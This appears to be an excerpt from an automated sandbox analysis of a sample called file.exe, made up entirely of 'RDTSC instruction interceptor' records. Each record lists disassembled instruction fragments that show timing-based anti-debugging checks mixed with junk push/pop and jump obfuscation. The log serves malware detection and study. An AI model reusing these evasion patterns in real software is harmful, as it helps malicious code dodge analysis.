Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C1E53 second address: 13C1E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAE8D0C6B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C2A07 second address: 13C2A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAE8D8939Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C2A15 second address: 13C2A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C2A19 second address: 13C2A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FFAE8D893A7h 0x00000010 mov esi, dword ptr [ebp+122D2CBEh] 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FFAE8D89398h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1867h], ebx 0x00000039 push 00000000h 0x0000003b xchg eax, ebx 0x0000003c jmp 00007FFAE8D8939Dh 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C2A85 second address: 13C2A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C61BA second address: 13C6222 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FFAE8D89396h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FFAE8D89398h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov di, EF47h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FFAE8D89398h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov bx, 0B9Bh 0x0000004b push 00000000h 0x0000004d sbb bx, 2224h 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C6222 second address: 13C6227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C6227 second address: 13C622C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C7273 second address: 13C727D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAE8D0C6BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C63D4 second address: 13C63D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C916C second address: 13C9173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C9173 second address: 13C9179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C9179 second address: 13C919D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAE8D0C6C8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CA16A second address: 13CA16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13C92EE second address: 13C9379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D38EDh], esi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FFAE8D0C6B8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 jmp 00007FFAE8D0C6C5h 0x0000003c mov eax, dword ptr [ebp+122D08F9h] 0x00000042 mov edi, dword ptr [ebp+122D2B13h] 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FFAE8D0C6B8h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Dh 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 stc 0x00000065 push eax 0x00000066 push edi 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13CDA3F second address: 13CDA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D175D second address: 13D1761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D1761 second address: 13D1767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D3821 second address: 13D3826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D3826 second address: 13D382C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D382C second address: 13D3850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE8D0C6BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FFAE8D0C6BCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D3850 second address: 13D385A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFAE8D89396h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D385A second address: 13D385E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D0932 second address: 13D0938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D0938 second address: 13D093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D09F2 second address: 13D09F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D68D5 second address: 13D6906 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAE8D0C6BDh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 js 00007FFAE8D0C6B6h 0x0000001a jp 00007FFAE8D0C6B6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D6F97 second address: 13D702E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ecx 0x00000009 jp 00007FFAE8D8939Ch 0x0000000f pop ecx 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D2A8Bh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FFAE8D89398h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FFAE8D89398h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push ebx 0x00000050 pushad 0x00000051 or edi, 19C2E7DBh 0x00000057 call 00007FFAE8D893A2h 0x0000005c pop edi 0x0000005d popad 0x0000005e pop edi 0x0000005f mov dword ptr [ebp+1246ADDFh], edx 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 jng 00007FFAE8D8939Ch 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D702E second address: 13D7057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFAE8D0C6C0h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAE8D0C6BCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136C36A second address: 136C385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE8D893A3h 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DF195 second address: 13DF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAE8D0C6C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DF1B4 second address: 13DF1E7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAE8D89396h 0x00000008 jmp 00007FFAE8D893A3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAE8D893A4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DF38E second address: 13DF392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2E56 second address: 13E2E74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAE8D893A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2E74 second address: 13E2E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE8D0C6C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2E90 second address: 13E2E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2E94 second address: 13E2EEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FFAE8D0C6C8h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jc 00007FFAE8D0C6BEh 0x0000001a mov eax, dword ptr [eax] 0x0000001c jmp 00007FFAE8D0C6BCh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFAE8D0C6BDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2FD0 second address: 13E2FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2FD4 second address: 13E2FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2FE0 second address: 13E2FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnc 00007FFAE8D89398h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2FF7 second address: 13E2FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2FFB second address: 13E3024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FFAE8D893A3h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007FFAE8D89396h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E65F9 second address: 13E65FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E65FF second address: 13E6603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E6603 second address: 13E6607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E6607 second address: 13E660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E660F second address: 13E6620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FFAE8D0C6B6h 0x00000009 jl 00007FFAE8D0C6B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E6620 second address: 13E664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007FFAE8D89396h 0x00000012 jmp 00007FFAE8D8939Ch 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FFAE8D8939Ah 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E664F second address: 13E665C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FFAE9061D66h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136FABC second address: 136FAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EB0E5 second address: 13EB111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 jnp 00007FFAE9061D66h 0x0000000e jmp 00007FFAE9061D6Ah 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAE9061D6Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EB111 second address: 13EB115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EB115 second address: 13EB11B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EB293 second address: 13EB297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EB297 second address: 13EB2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FFAE9061D79h 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007FFAE9061D6Eh 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F5FE7 second address: 13F6000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FFAE903A96Bh 0x0000000b jne 00007FFAE903A966h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4B64 second address: 13F4B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFAE9061D66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4B76 second address: 13F4B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4B7A second address: 13F4B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4B84 second address: 13F4B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4D0B second address: 13F4D10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4D10 second address: 13F4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4D1C second address: 13F4D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4D22 second address: 13F4D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4D26 second address: 13F4D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4D2A second address: 13F4D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FFAE903A966h 0x0000000d pop edi 0x0000000e jmp 00007FFAE903A973h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFAE903A974h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4F05 second address: 13F4F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D78h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4F27 second address: 13F4F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FFAE903A96Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F488D second address: 13F4893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F55FE second address: 13F562F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FFAE903A978h 0x0000000b jmp 00007FFAE903A970h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAE903A972h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F562F second address: 13F565D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAE9061D79h 0x0000000e jmp 00007FFAE9061D6Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F57CF second address: 13F57F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE903A973h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jo 00007FFAE903A966h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F57F1 second address: 13F5803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFAE9061D6Ah 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F5803 second address: 13F581C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A96Ch 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F581C second address: 13F582E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE9061D6Dh 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F582E second address: 13F584E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAE903A96Fh 0x00000008 jnl 00007FFAE903A966h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F59B4 second address: 13F59BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F59BA second address: 13F59C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FFAE903A966h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE958 second address: 13FE95F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13805BD second address: 13805CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13805CB second address: 13805E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE9061D6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13805E0 second address: 13805F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAE903A973h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDB74 second address: 13FDB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
